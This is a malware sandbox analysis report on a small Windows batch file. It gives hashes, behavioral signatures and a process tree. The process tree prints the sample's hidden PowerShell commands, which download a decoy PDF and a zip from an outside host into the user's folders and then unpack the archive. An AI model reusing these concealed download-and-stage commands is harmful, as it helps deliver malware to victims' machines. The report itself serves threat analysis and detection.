Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
05-01-2025 08:00
Static task
static1
Behavioral task
behavioral1
Sample
e8dfdb915a523a09e139aaa900991ddd.bat
Resource
win7-20240708-en
General
-
Target
e8dfdb915a523a09e139aaa900991ddd.bat
-
Size
498B
-
MD5
e8dfdb915a523a09e139aaa900991ddd
-
SHA1
d23f4798c549bfb7ddd968c4c2a971f67468a662
-
SHA256
91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e
-
SHA512
b4e737d1c80420688bf856df02a580b691d120307b7d31ea4766448ccd0c6eec7b2c48424691e92dffba58ca8c9a8df989f5b683d9363cac37d3dd3e5ad1623e
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 2448 powershell.exe 2880 powershell.exe 2936 powershell.exe 2448 powershell.exe 2880 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2448 powershell.exe 2880 powershell.exe 2936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1928 wrote to memory of 2448 1928 cmd.exe 31 PID 1928 wrote to memory of 2448 1928 cmd.exe 31 PID 1928 wrote to memory of 2448 1928 cmd.exe 31 PID 1928 wrote to memory of 2880 1928 cmd.exe 33 PID 1928 wrote to memory of 2880 1928 cmd.exe 33 PID 1928 wrote to memory of 2880 1928 cmd.exe 33 PID 1928 wrote to memory of 2936 1928 cmd.exe 34 PID 1928 wrote to memory of 2936 1928 cmd.exe 34 PID 1928 wrote to memory of 2936 1928 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\e8dfdb915a523a09e139aaa900991ddd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\Admin\Downloads\W2.pdf"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\Admin\AppData\Local\Temp\msword.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\msword -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD558270cb19bffc219137fc7c36804bc79
SHA14e3db46677486bd3bd19f20a58367b9b432c9157
SHA25613a8d088f675fb57328cbd4507cae09c2b79a401ec38e602306b34e9d57640dd
SHA5120bdb9461492955605bb7358ca3310e69938bad8b7a0f09db53c089dcb33b81726cf32d81981c8a3d5aadfadda5530fd74bbbd8897be10f8ab8d49af5d3c645c7